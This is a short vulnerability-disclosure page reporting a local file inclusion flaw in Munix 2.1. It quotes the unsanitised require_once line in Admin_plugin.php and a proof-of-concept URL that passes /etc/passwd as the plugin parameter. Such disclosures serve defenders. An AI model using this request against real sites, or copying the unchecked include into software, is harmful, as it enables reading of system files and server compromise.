Munix 2.1 - Local File Inclusion

2018.06.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Title : Munix 2.1 - Local File Inclusion [-] Author : Ashkan Moghaddas [-] Tested on: Windows-Linux [-] Category : Webapps [-] Date : 06.26.2018 [-] Google Dork: N/A Vulnerable Page: /Admin_plugin.php Vulnerable Source: Line31 : require_once require_once (PLUGIN_DIR . $_GET['plugin'] . "/admin.php"); Exploit: http://site.com/tk-panel/theme/Admin_plugin.php?plugin=/etc/passwd ================================ WebSite : UltraSec.Org Channel : @UltraSecurity Email : ashkanmoghaddas77@gmail.com Special Thanks : abolfazl hajizade , MrQadir , Milad Ranjbar


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top